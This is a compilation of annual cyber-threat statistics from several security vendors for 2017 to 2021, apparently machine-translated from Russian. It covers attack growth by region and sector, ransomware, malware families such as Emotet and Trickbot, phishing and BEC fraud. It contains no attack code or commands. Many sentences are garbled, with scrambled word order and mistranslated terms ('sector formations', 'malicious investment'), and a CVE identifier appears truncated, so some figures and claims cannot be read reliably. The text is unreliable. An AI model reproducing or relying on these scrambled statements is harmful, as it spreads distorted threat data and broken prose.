According to Symantec global data, small businesses are most at risk of receiving malware emails: in organizations with personnel from 1 to 250 people, one of 323 incoming emails is viral, while with a staff of 1001 to 1500, one of 823 emails is infected. This suggests that even a small business should take care of its security, and that thinking "we are small, so we are not interested in cybercriminals" can lead to data loss and stop the company from working, a Tet spokesman said.

The best defense is a cyber attack that did not happen, so we urge businesses to take care of security in advance. This includes having a plan in place not only in the event of a cyber crisis, but also a strategy to ensure business continuity. In the process of developing such plans, it is possible to identify possible vulnerabilities, improve performance and identify responsible departments in the event of a crisis so that employees do not panic and know what to do. But the most important and effective prevention of cyber incidents is the constant training of employees in cyber hygiene!

The number of cyber attacks on corporate networks increased by 50%

On January 12, 2022, the Check Point Research (CPR) team at Check Point Software Technologies shared statistics reflecting the growth of cyber attacks in 2021 by region, country and industry.

For example, in 2021, CPR (Check Point Research) recorded an increase in the number of cyber attacks on corporate networks by 50% per week compared to 2020. The researchers noted that the peak of the attacks was in December (925 attacks on the organization per week) - it can be assumed that this was due to the exploitation of the Log4J.

The most desirable for hackers were the organizations, Africa the Asia-Pacific region and. Latin America The highest percentage of cyber attacks compared to 2020 is seen in. To Europe Among the most attacked industries in the world, the sector formations and research ranked first.

Priority sectors for hackers in 2021

1. Organizations from the fields of education and research (an increase in attacks by 75%);
2. Organizations from the state and defense sphere (an increase in attacks by 47%);
3. Communications organizations (51% increase in attacks);
4. IT service providers (67% increase in attacks);
5. Healthcare organizations (71% increase in attacks).

Priority regions

1. Africa (+ 13%);
2. Asia Pacific (+ 25%);
3. Latin America (+ 38%);
4. Europe (+ 68%);
5. North America (+ 61%).

Hackers continue to implement innovative approaches and solutions, "said Omer Dembinsky, threat data manager at Check Point Software Technologies. - In 2021, we saw a staggering increase in cyber attacks of 50% per week in corporate networks compared to 2020. We noted the peak of attacks at the end of the year, mainly due to attempts to exploit the Log4J vulnerability. New methods of penetration and methods of evading detection have made it much easier for hackers to implement their plans. Most worryingly, some key social sectors are on the most attacked list.

According to Omer, government organizations, companies from the fields of education and health care were among the five most attacked industries in the world. Those numbers are only expected to increase in 2022. Attackers will continue to introduce new tools and methods for conducting cyber attacks, especially using ransomware. We can say that we have cyberpandemia.

Safety recommendations

1. Care about warning threats, not detecting them;
2. Protect all possible frontiers;
3. Install the update as soon as they are available;
4. Network segmentation;
5. Employee training;
6. Implement advanced security technologies.

40% increase in cyber attacks - Check Point

On October 6, 2021, Check Point Software Technologies announced the results of an analysis of current cyber threats around the world. The analysis showed that the number of cyber attacks in 2021 increased by 40% compared to 2020. In Russia, the number of attacks increased by 54% year-on-year.

After a slight drop in the first weeks of 2020, since March 2020, there has been a significant increase in the number of attacks in the world, which reached its peak in September 2021. Then the number of attacks on an organization in the world amounted to more than 870 per week - this is twice the number of attacks in March 2020.

Cyber ​ ​ attacks by region

No. 1 - Africa: An average of 1,615 attacks per week on the organisation, a 15% increase from 2020
. No. 2 - Asia-Pacific: an average of 1,299 attacks per week on the organization - 20% higher year-on-year
. No. 3 - Latin America: 1,117 attacks, 37% more than in 2020
. No. 4 - Europe: An average of 665 attacks per week, up 65% from 2020
. No. 5 - North America: An average of 497 attacks per week, up 57%.

Europe and North America experienced the sharpest increase in the number of cyber attacks compared to 2020 - an increase of 65% and 57%, respectively.

In the Asia-Pacific region, the largest number of attempts to attack ransomware is observed: in 2021, one of 34 organizations is subjected to it every week.

^{Figure 1. Average number of cyber attacks per week per organization (January 2020-September 2021}

While Africa remains the region most attacked by attackers, Europe and North America faced the fastest rise in cyber attacks since early 2020 in September 2021. Attackers try to influence organizations in Africa most often - 1,615 attacks a week. This is 15% more than last year. This is followed by the Asia-Pacific region - 1299 attacks per week on the organization on average and an increase of 20%, followed by Latin America - 1117 attacks (an increase of 37%), Europe - 665 attempted attacks (an increase of 65%) and North America - 497 attacks and an increase of 57% year-on-year.

The sectors that are subjected to the largest number of cyber attacks were education and research activities - an average of 1,468 attacks per week (an increase of 60% compared to 2020), followed by government, military organizations - from 1,082 (an increase of 40%) and health care - with 752 attempted attacks (an increase of 55%).

In addition, Check Point Research noted that in 2021, on average, every 61st organization is exposed weekly, programs extortioners which is 9% more than in 2020. The most popular among attackers is the ISP/MSP sector (and) Providers Internet , IT services where every 36th organization is faced with ransomware attacks. This is 32% more than in 2020. In second place is health care - here one of 44 organizations is regularly attacked by ransomware (an increase of 39%), and in third place are suppliers - ON every 52nd organization (an increase of 21%).

The largest number of ransomware attacks is observed in the Asia-Pacific region: here one of 34 organizations faces them every week. This is 10% less compared to 2020. This is followed by Africa, where every 48th organization is attacked (a decrease of 7%) and Latin America - every 57th organization (an increase of 6% year-on-year).

As for the types of malware that are most often used for attacks, botnets came first: on average, more than 8% of organizations are exposed to them in the world (this is 9% less than in 2020). This is followed by banking Trojans - 4.6% of companies (an increase of 26%) and cryptominers - 4.2% (a decrease of 22% year-on-year).

The data used in this report is collected and analyzed in Check Point ThreatCloud. ThreatCloud is a large collaborative cybercrime network that provides threat and attack trend data from a global network of threat sensors. Data Base ThreatCloud scans more than 3 billion websites, 600 million files every day, and detects more than 250 million malware every day.

2020

Industrial incidents up 91% - Positive Technologies

On April 28, 2021, Positive Technologies announced that its experts analyzed the cyber threats of 2020 and found that compared to 2019, the number of incidents at industrial enterprises increased by 91%, and the number of attacks using malware increased by 54%. In first place in the number of attacks using ransomware were medical institutions. Read more here.

The number of identified cyber threats increased by 20% and exceeded 62.6 billion - Trend Micro

On February 26, 2021, Trend Micro announced that in 2020, the company's products identified 119,000 cyber threats every minute. The target of the attacks was primarily employees working from home and the network infrastructure. Trend Micro published this and other facts in the annual review report A Constant State of Flux: Trend Micro 2020 Annual Cybersecurity Report ("Constant variability: Trend Micro report on the state of cybersecurity for the 2020 year").

The report, among other things, says that one of the most popular targets among cybercriminals in 2020 was home networks. With their help, attackers sought to gain access to corporate network resources or use home IoT devices for their botnets. According to Trend Micro estimates, the number of attacks on home networks increased by 210% and reached almost 2.9 billion, affecting about 15.5% of routers. 73% of these attacks used the brute force method to gain control of a router or smart home appliance.

Among the 62.6 billion threats blocked in 2020 by Trend Micro solutions, in 91% of cases, email was the vector of the attack . This means that phishing remains an extremely popular tool among cybercriminals. The company identified 14 million unique links leading to phishing pages on the Web. With their help, the attackers sought to obtain information from employees who had lost their vigilance during their work from home.

In 2020, companies faced an unprecedented number of cyber threats, their vast infrastructure, including in employees' home networks. The main hacking tools are still familiar tactics: phishing, brute force and exploitation of vulnerabilities - which should help in the development of security tools. Organizations around the world have had time to assess the operational and cybersecurity risks associated with the pandemic. 2021 gives them a chance to adapt to threats and apply comprehensive cloud security systems that will help protect distributed infrastructure. noted Jon Clay, Director, Global Threat Awareness at Trend Micro

The report also tells about other notable trends:

• The number of ransomware families that are used for "double extortion" attacks has grown by 34%: criminals first steal data and demand a ransom so as not to publish it, and only then encrypt it. Targeted attacks on government organizations, banks, industrial and health facilities are also gaining popularity.
• The number of vulnerabilities published by the Zero Day Initiative (ZDI) in 2020 increased by 40% compared to 2019. At the same time, Trend Micro notes that cybercriminals continue to actively use vulnerabilities known since 2005.
• A large number of attacks exploited employee service vulnerabilities VPN remotely working. CVE-2019-11510, a critical vulnerability in Pulse Connect Secure related to access to arbitrary reading, files was featured in Trend Micro's 800,000 reports. cyber attacks
• Incorrect configuration of cloud services also led to negative consequences in 2020. According to Trend Micro, unprotected APIs have been used by cybercriminals in several cryptocurrency mining attacks.
• The ZDI initiative has released information about 1,453 vulnerabilities, almost 80% of which are critical or high-risk.
• And a little about positive trends: the number of detected BEC attacks (attacks related to the compromise of business mail) in 2020 decreased by 17%, but the company does not have data on the success rate of these attacks.

in 2020, it RUSSIAN FEDERATION suffered quite a bit from attacks using ransomware: their number was only 9.6% of the pan-European indicator and 0.58% of the world. Nevertheless, in terms of the number of threats identified in email messages, Russia was in second place To Europe in and fifth in the world (1,245 billion). Also high was the number servers botnets of links leading to harmful sites with in the Russian Federation hosting (3.4 thousand and almost 6.5 million, respectively) and the number of visits by Russian users to such sites around the world (more than 14.5 million). In terms of the total number of malicious detected, Russia ON was in 43rd place in the world with 1.4 million attacks.

There were practically no BEC- and PoS-attacks in 2020 in the country, but in terms of the number of attacks on mobile devices, Russia took 11th place in the world - more than 5 million applications fell under the suspicion of Trend Micro solutions, of which 21.5 thousand were malicious. Also in the Russian Federation, attacks on users' home networks turned out to be extremely popular. The number of events identified by Trend Micro tools in this area exceeded 358 million, which brought Russia to the first place with 12.5% of their global number.

2019

Rostelecom-Solar: the volume of cyber incidents increased by 30% - Rostelecom-Solar

On March 30, 2020, Rostelecom-Solar reported that in 2019 the volume of cyber incidents increased by 30%, while the share of external incidents increased from 54% to 58%. In total, in 2019, the Solar JSOC Cyber ​ ​ Threat Monitoring and Response Center identified and repelled over 1.1 million attacks targeting the infrastructure of more than 100 large government and commercial organizations from various sectors of the economy.

In 2019, Solar JSOC analysts for the first time highlight a sharp increase (by 40%) in attacks aimed at gaining control over the IT infrastructure, against the background of a 15% decrease in the number of attacks aimed at stealing funds. In previous years, the picture was exactly the opposite: the number of attacks to steal money grew by tens of percent annually, while the interest of cybercriminals in infrastructure as such was less active. Experts attribute the current situation to the fact that the average level of security of banks, which most often served as a target for cyber criminals, has increased significantly. This forces hackers to look for more vulnerable targets. Automated process control systems (APCS) of enterprises and closed network segments are becoming more and more attractive for them.

A long and discreet presence in the organization's infrastructure allows attackers to investigate in detail its internal processes, gain deeper access to and IT control over systems. In the future hackers monetize , these points of presence, selling them on the black market, blackmailing the victim organization or engaged in competitive intelligence. In addition, in recent years, attacks have increasingly been aimed industrial power at objects, as well as state authorities, the control over the infrastructure of which is critical for the country as a whole, told Vladimir Dryukov, director of the center for monitoring and responding to cyber attacks Solar JSOC company "Rostelecom-Solar"

Against the background of an increase in the volume of external attacks, Solar JSOC experts note a positive trend: organizations began to pay more attention to protecting their information infrastructure. Including thanks to this, for the first time in 5 years, the share of critical incidents decreased (from 19% to 16%).

The dynamics of closing vulnerabilities in Russia is significantly higher than in other countries - Russian servers make up less than 5% of the vulnerable in the world. For example, in 2019, the number of Russian servers on the perimeter exposed to the EternalBlue vulnerability decreased by more than five times - from 260 to 49.7 thousand units. However, approximately 40% of those servers that are still vulnerable are owned by large commercial or state-owned companies, emphasized Vladimir Dryukov

As before, the most popular methods of hacking corporate infrastructures remain infection harmful ON (,, viruses trojans spyware, etc.) and exploitation of vulnerabilities in web applications (web portals, e-mail personal accounts, etc.). The frequency of their use increased by 11% and 13%, respectively. But if in 2018 the main functionality was malware enciphering data, then in 2019 - production. cryptocurrencies

DDoS-ataks demonstrate significant technological progress. In 2019, for DDoS, attackers were 40% more likely to use IoT-botnets - networks of infected "smart" devices. As a rule, they are weakly protected and easily hacked. With the growing number of IoT devices in the world, DDoS attacks will be cheaper and more affordable, and companies may soon face another surge in this threat, Solar JSOC experts warn.

The number of attacks on mobile banking in the first half of the year increased 2 times - Check Point

On August 1, 2019, Check Point Software Technologies released the Cyber Attack Tracks: 2019 Mid-Year Report. Hackers continue to develop new toolkits and methods that target corporate data stored in cloud infrastructure; personal mobile devices; various applications and even popular email platforms. None of the sectors are fully protected from cyber attacks, the researchers note.

Check Point experts have identified key trends in cyber threats in the first half of 2019:

• Mobile banking: The number of attacks has doubled compared to 2018. Banking malware is a very common mobile threat. Banking malware can steal payment and credentials, funds from victims' bank accounts. New versions of banking malware are ready for mass distribution for everyone who is ready to pay for them.
• Supply chain attack: Cybercriminals can expand their influence by using an attack on a company's supply chain. With this type of cyber attack, hackers inject malicious code directly into the software of the victim company. After executing this malicious code, criminals can access the private information of the company.
• Email: Attackers use various methods to bypass security solutions and spam filters. For example, they send complex coded emails, as well as complex base code that mixes regular text letters with HTML characters. In addition, attackers use social engineering methods, as well as changing and personalizing the contents of emails.
• Cloudy storages: The growing popularity of public clouds has led to an increase in cyberattacks targeting the vast volumes confidential data on these platforms. The biggest threats to cloud security in 2019: misconfiguration and poor management of cloud resources.

"Neither cloud storage nor our smartphones and email - no environment is immune to cyber attacks. Threats such as personalized ransomware attacks, DNS attacks and cryptominers will continue to be relevant in 2019. Security experts need to keep abreast of the latest threats and attack techniques to ensure the best level of protection for their organizations " noted' Vasily Diaghilev, Head of Check Point Software Technologies Russia and CIS

The most active malware in the first half of 2019 according to Check Point Software Technologies:

1. Emotet (29%) is an advanced, self-propagating modular Trojan. Emotet was once used as a banking Trojan, and more recently used as a delivery of other malware or malicious campaigns. It uses several methods to avoid detection. It is also distributed through phishing spam messages containing malicious attachments or links.
2. Dorkbot (18%) is an IRC-based worm designed to remotely execute code by its operator. It can also be used to download additional malware into an infected system to steal confidential information.
3. Trickbot ( 11%) - Trickbot is a variant of Dyre that appeared in October 2016. Since its first introduction, it has targeted banks mainly in Australia and the UK, and more recently it has started to appear also in India, Singapore and Malaysia.

The most active cryptominers in the first half of 2019:

1. Coinhive (23%) is a cryptominer designed to mine Monero cryptocurrency without the user's knowledge when he visits websites. Coinhive only appeared in September 2017, but as of August 2019, it has already hit 12% of organizations around the world.
2. Cryptoloot (22%) is a miner embedded in the site using JavaScript code. Mines Monero cryptocurrencies without user permission.
3. XMRig (20%) - Open source software first discovered in May 2017. Used to mine Monero cryptocurrency.

The most active mobile threats of the first half of 2019:

1. Triada (30%) - A modular backdoor for Android that provides superuser privileges for downloaded malware and also helps inject it into system processes. Triada has also been spotted spoofing URLs downloaded in browsers.
2. Lotoor (11%) is a program that exploits vulnerabilities in the Android operating system to gain privileged root access on compromised mobile devices.
3. Hidad (7%) - A modular backdoor for Android that grants superuser rights to downloaded malware and ON also helps inject it into system processes. It can get access to the key security details embedded in, OS allowing it to get sensitive user data.

In Russia, there was very active malware mobile software, which was called "Agent Smith." Under the guise of a hidden app linked to Google, the malware exploits known Android vulnerabilities and automatically replaces installed apps with malicious versions unnoticed by the user. Users downloaded the app from the popular unofficial 9Apps app store. As of August 2019, Agent Smith infected about 57 thousand devices in Russia.

Top malware for banks in the first half of 2019:

1. Ramnit (28%) is a banking Trojan that steals data from bank customer accounts, passwords FTP files session cookies and personal data.
2. Trickbot (21%) is the dominant banking Trojan, constantly replenished with capabilities, functions and propagation vectors. This allows Trickbot to be flexible and customizable malware that can be distributed through multi-purpose campaigns.
3. Ursnif (10%) is a Trojan running on the Windows platform. It is usually distributed through exploit sets - Angler and Rig. It can steal information related to Verifone Point-of-Sale (POS) payment software. To do this, the Trojan contacts the remote server to download the collected information and receive instructions. After that, it downloads the files to the infected system and executes them.

The first half 2019 report "Cyber Attack Tracks: Annual Report 2019" shows the entire possible landscape of cyber threats. The findings are based on data from the Global Threat Impact Index and ThreatCloud Map, which were developed by ThreatCloud intelligence, an anti-cybercrime network that provides threat and attack trend data from a global network of threat sensors.

2018

Solar recorded an 89% increase in the number of cyber attacks in Russia

On April 24, 2019, Rostelecom-Solar, a national provider of technologies and services for protecting information assets, monitoring and managing information security, presented an analytical report on cyber attacks on Russian companies for 2018.

The average daily flow of events information security processed SIEM by -systems and used to provide services Solar JSOC amounted to 72.2 billion. In total, in 2018, Solar JSOC specialists recorded over 765 thousand computer attacks. This is 89% more than a year earlier. The proportion of critical incidents rose to 19%, thus reaching the highest level since 2015. This trend suggests that the tools of attackers continue to improve. The pace of its creation in 2018 also accelerated rapidly - already 2 days after the appearance of information about the vulnerability CVE-2018-159 the Cobalt group was already sending out the exploiting group. harmful ON

In the second half of 2018, the number of attacks aimed at gaining control over the IT infrastructure increased by 20%. Attackers are striving to quietly gain a foothold in the infrastructure in order to investigate it in detail and gain as deep access as possible to information and technological systems.

author '= Dryukov Vladimir, Director of the Solar JSOC Cyber Attack Monitoring and Response Center of Rostelecom-Solar ' We observe that at the start, attackers often use completely non-core tools: for example, cases of sending banking Trojans to state authorities and energy organizations are often recorded. In the future, managed segments of the botnet are resold to other groups and the attack is already developing using specialized tools.

The number of attacks aimed at theft of funds increased by 37% compared to the first half of the year. The development of information exchange within the community continues to allow credit and financial institutions to receive timely information about the way the attack is carried out and prevent the actions of attackers. However, even after receiving information about the type of cyber attack that has appeared, not all companies are taking any protection measures. For example, despite the damage from mass attacks in 2017-2018, as of April 2019, 266,294 Russian servers are still exposed to the EternalBlue vulnerability, 953 network equipment units work with the unclosed Cisco SMI protocol. These organizations are still vulnerable to seemingly outdated attacks like WannaCry or attacks on Cisco hardware.

2018 was also marked by a number of large virus infections of technological networks isolated from Internet (segment). APCS Since such networks antivirus are manually updated, accidental infection of one node leads to the rapid spread of the virus, and the process of eliminating the threat, on the contrary, lasts several times longer than in the corporate segment.

According to Solar JSOC, about 70% of complex targeted attacks start with phishing. On average, every 7th user who fails awareness courses lends themselves to social engineering. However, this figure can vary depending on the functional unit of the company. In the legal service, on average, every fourth employee becomes a victim of phishing, in accounting, financial and economic service and logistics - every fifth, in the secretariat and technical support service - every sixth.

Another threat to the information security of organizations posed by employees is the leakage of confidential data. In 2018, they accounted for almost half of all internal information security incidents. In about one in five cases, the actions of employees led to the compromise of accounts from internal corporate IT systems. The perpetrators of internal incidents were usually ordinary employees (about 60% of cases). The share of contractors and outsourcers usually fluctuated near the 10% mark, but in the second half of the year it was up to 15.2%. This is probably due to the fact that the distribution of the service model contributes to the development of the outsourcing market, while the level of information security in Russian companies remains quite low.

Trend Micro: About 48bn cyber attacks blocked

On February 13, 2019, it became known that Trend Micro Incorporated presented statistics on cyber threats in the world for 2018 in the context of the most popular types of attacks and "attacked" countries. In 2018, more than 2.5 trillion requests were processed by the company's decisions. As a result, about 48 billion attacks were blocked, including email threats, malicious files and URLs, and 222 "families" of ransomware were identified.

Phishing is still the most popular and numerous cyber threat. In total, 41 billion cases were prevented over the year, while between November and December their number decreased by 200 million. The highest level of cyber attacks was in the United States - over 10 billion attacks were stopped there, in China and Brazil the number of stopped attempts exceeded 2 billion, in India - 1.5 billion.

The most common malicious investment was the.XLS format, a total of 22 million spam attacks were recorded. And the number of blocked URLs referencing malicious applications or hosting sites has exceeded 1 billion. Among the countries whose residents most often encountered malicious URLs, Japan (160 million blocked attacks), the United States (155 million) and Taiwan (73 million) are leading.

Cyber ​ ​ attacks through compromise of business electronic correspondence (BEC) have increased. For example, in 2017, about 10 thousand cases were recorded, and in 2018 over 12 thousand. Basically, employees opened letters requesting payment on behalf of suppliers. Or in cases where the sender was represented by a lawyer or lawyer of the company who is responsible for confidential issues. However, the most popular was the fraud of hacking a TOP management account and sending letters or "imitating" letters on behalf of the CEO and CFO, in order to transfer funds to accounts controlled by them. The most affected by such attacks Australia (4,230 blocked threats) and (USA 3,694 blocked threats).

At the end of 2018, it is worth highlighting the five most malicious programs - this is the CoinMiner cryptocurrency miner (1,350,951 attacks), WannaCry ransomware (616,399 attacks), Powload (378,825 attacks), Downad (240,746 attacks) and Sality (166,981 attacks).

If we consider malware in the context of the so-called "areas of application," then, for example, file viruses Emotet remain the most dangerous for the banking sector - almost 133.5 hacking attempts were prevented with its participation, and Ramnit - 78,062 attacks were blocked. In the mobile sector for Android, these are SMSreg (1,638,167) and Shedun (1,345,900), for iOS - IOS_Jail Break Tool.A (397) and IOS_I Back Door.A (65). In the case of PoS attacks, most often scammers used such malicious tools as TinyPOS (1,264) and Recoload (286).

author '= Mikhail Kondrashin, CTO of Trend Micro in Russia and CIS ' Both in Russia and around the world, we see a clearly defined trend in the transition from the use of ransomware to cryptocurrency miners. If your laptop or smartphone has rapidly discharged its battery, be sure to check it with modern antivirus.

2017: Eset records 15m cyber attacks on torrent users

Eset on August 18, 2017 published the results of an analysis of cyber attacks carried out using peer-to-peer networks. Since the beginning of 2016, the Eset telemetry system has recorded 15 million incidents in which loading malicious code was associated with popular torrent applications and file-sharing services. Hackers use peer-to-peer networks to deliver malware in two ways: compromising trusted torrent applications or masking malicious content in "giveaways."

In particular, in 2016, attackers attacked macOS users by hacking into the Transmission torrent client website. They redesigned the app to include malicious code.

In April 2016, the KeRanger encryptor was downloaded from the Transmission website under the guise of a legitimate application. The developers removed the infected distribution after a few hours, but thousands of users were affected by the threat. The authors of KeRanger used a strong encryption algorithm, which minimized the chances of data recovery.

In August 2016, hackers repeated the attack on the Transmission website. This time, along with the torrent client, the Keydnap malware was installed on the computer, designed to steal passwords from the iCloud Keychain and remotely access the system. The Transmission team removed the trojanized application from the site within minutes of Eset's contact.

However, according to Eset, not all incidents are related to, software there is also a risk of downloading malicious torrents. In April 2017, the company's experts discovered trojan Sathurbot, which was distributed in this way - it hid in torrents with a pirate software or film, disguising itself as a codec.

Computers infected with Sathurbot were part of a structure botnet that at the time of the study totaled 20 thousand devices. Botnet searched the network for sites based on the database WordPress and hacked them by brute-force passwords. Compromised sites were used to further spread malicious torrents.

In February 2017, attackers handed out a new encoder disguised as Patcher, an application for hacking Adobe Premiere Pro, Microsoft Office for Mac and other paid software, through torrent trackers. It is impossible to restore encrypted files even if the ransom is paid - the false Patcher does not provide a communication function with the command server, so the encryptor operators do not have a decryption key.

Just in case, I remind you of responsibility for copyright infringement and the use of pirated content, - said Alexey Oskin, head of technical marketing at Eset Russia. - Nevertheless, the R2R ecosystem is not only and not so much piracy, it has a number of legitimate ways of application. And, like any mass technology, file-sharing services are of interest to cybercriminals. Basic recommendations: use only licensed software, ignore suspicious sites and torrents, protect your computer with a comprehensive antivirus product.

Notes